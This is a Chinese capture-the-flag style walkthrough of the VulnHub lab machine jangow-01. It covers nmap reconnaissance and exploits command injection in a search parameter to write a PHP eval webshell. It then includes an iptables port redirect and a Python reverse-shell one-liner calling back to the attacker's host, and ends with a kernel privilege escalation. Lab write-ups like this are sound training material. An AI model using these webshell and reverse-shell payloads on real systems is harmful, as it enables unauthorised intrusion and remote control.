首页 > 其他分享 >vuluhub_jangow-01-1.0.1

vuluhub_jangow-01-1.0.1

时间:2023-02-14 16:55:29浏览次数:62  
标签:01 1.0 Nmap kali up tcp 192.168 vuluhub ports

前言

靶机:jangow-01-1.0.1
攻击机:kali linux2022.4
靶机描述
image

打靶ing

靶机探测

使用nmap扫描网段

点击查看代码
┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.70.0/24       
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 20:56 EST
Nmap scan report for 192.168.70.1
Host is up (0.00012s latency).
All 1000 scanned ports on 192.168.70.1 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.70.2
Host is up (0.000056s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
53/tcp open  domain
MAC Address: 00:50:56:FE:42:C8 (VMware)

Nmap scan report for 192.168.70.152
Host is up (0.00027s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
MAC Address: 00:0C:29:67:A6:61 (VMware)

Nmap scan report for 192.168.70.254
Host is up (0.00022s latency).
All 1000 scanned ports on 192.168.70.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:EA:9C:6A (VMware)

Nmap scan report for 192.168.70.137
Host is up (0.0000070s latency).
All 1000 scanned ports on 192.168.70.137 are in ignored states.
Not shown: 1000 closed tcp ports (reset)

Nmap done: 256 IP addresses (5 hosts up) scanned in 11.44 seconds
发现靶机ip:192.168.70.152

扫描开放端口信息

点击查看代码
┌──(root㉿kali)-[/home/kali]
└─# nmap -A -p- 192.168.70.152 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 20:59 EST
Nmap scan report for 192.168.70.152
Host is up (0.00042s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.18
|_http-title: Index of /
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2021-06-10 18:05  site/
|_
MAC Address: 00:0C:29:67:A6:61 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms 192.168.70.152

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.11 seconds

查看网站信息

先访问80端口
image
可以发现是一个目录遍历,查找一下有用信息
在site目录下发现一个网站
image
image

漏洞探测

四处看看功能点
image
发现了一个可以传参得接口
http://192.168.70.152/site/busque.php?buscar=

对变量buscar进行测试
传入参数1
image

没什么回显,传入id
image

在该参数发现存在rce

漏洞利用

利用该漏洞写入webshell
payload
192.168.70.152/site/busque.php?buscar=echo '<?php @eval($_POST["shell"]); ' > shell.php
image
查看目录写入成功
使用蚁剑连接木马
image
image
成功连接shell

收集靶机信息

image
home的用户目录中看到了user.txt
image
是一段md值使用somd5解码

点此即达-->somd5

image

这里可以发现是空密码

目前不知道有什么用

反弹shell+提升权限

写个脚本端口是否被限制
image

点击查看代码
#!/bin/bash
for i in {1..65535};
do
    timeout 1 nc -vz 192.168.70.137 $i && echo "$i open" >> out.txt || echo "$i closed" >> out.txt;
done

kali设置防火墙权限
iptables -A PREROUTING -t nat -p tcp --dport 1:65535 -j REDIRECT --to-port 1234
然后打开nc监听端口
image

赋予权限运行脚本
image

image

image

对防火墙做了端口绑定所以直接监听1234端口即可,目标主机连接kali的443端口就可以反弹shell了

点击查看代码
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.70.137",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

image
拿到完整shell之后查看内核信息

image

ubuntu16.04直接查找相关得exp

image

上传exp

image

编译赋权执行

image

image

提权成功

查看root目录找找flag

image

image

image

之前用户目录也获取到了md5值,应该就是这个靶机得flag了

标签:01,1.0,Nmap,kali,up,tcp,192.168,vuluhub,ports
From: https://www.cnblogs.com/zy4024/p/jangow.html

相关文章

  • sqlServer 2019 开发版(Developer)下载及安装
    下载软件官网只有2022的,2019使用百度网盘进行下载安装下崽器选择自定义安装选择语言、以及安装位置点击“安装”安装SQLServer可能的故障以上步骤......
  • 798~801 删除选中功能,分析,选取选中条目id,删除选中服务器,细节处理
    删除选中功能分析 voiddelSelectedUser(String[]ids);//删除选中==========@OverridepublicvoiddelSelectedUser(String[]ids){if(ids!=nu......
  • 2013年工作中遇到的20个问题:21-40
    21.强制类型转换时,出现异常ElementItempireodItem=(ElementItem)columnCollections.get(columnCollections.size()-1));从新审视这段代码,会发现很多问题。a.一行代......
  • 2013年工作中遇到的20个问题:1-20
    1.列不允许有NULL值,INSERT失败。原因:数据库的表没有设置主键!(遇到至少2次)客户的数据库是由客户自己去维护的!2.项目重构后Flex端卡死了。原因:Hibernate底层获得Sessi......
  • 2012年工作中遇到的20个问题
    2012年工作中遇到了很多问题,刚刚开始时,遇到的问题没有及时记载下来,挺可惜的。1.构造SQL语句--简化构造select*fromuserwhere1=1;if(name!=null){andname="fa......
  • 2012总结--第10篇--工作篇
    3月到5月实习期间,完成了A项目的一个模块。更多信息,请参见实习期间遇到的5大问题及解决方案。好几次比较激动,最不淡定的一段工作。6月毕业到正式入职期间,看书,写代码,看......
  • [2012最后的力作] PC:亲爱的主人,我想退休了
    亲爱的主人:我想退休了!2012年以来,我感到身体很不适。坚持了将近1年,实在是扛不住了。还记得3年前的2009年7月,主人您把我从武汉广埠屯买回来的时候,我当时特高兴。主人您......
  • 2012总结--第1篇--技术篇
    以广度与深度并重为核心指南!1.语言1.1深入学习Java。1.2复习C++,Linux系统下写了几个小程序。大致阅读了一遍《C++Primer》。1.3了解了Python,在Windows平台写了......
  • 2012总结--第9篇--价值观篇
    自己也不小了,转眼间1/3左右的人生已经过去。是该给自己立点规矩,适度地约束自己的言行举止了。无论自己是迷茫时,或是得意时,都能有所选择!1.责任努力奋斗,自立自强!1.1父......
  • 2012总结--第5篇--人脉篇
    综述今年新结识了很多人,友好交往的人还比较多。感觉最缺少的,就是和自己向一个方向走的IT相关的人士。公司很多人也都挺熟悉的,总感觉缺少了一点什么。高中的很多同学,有种......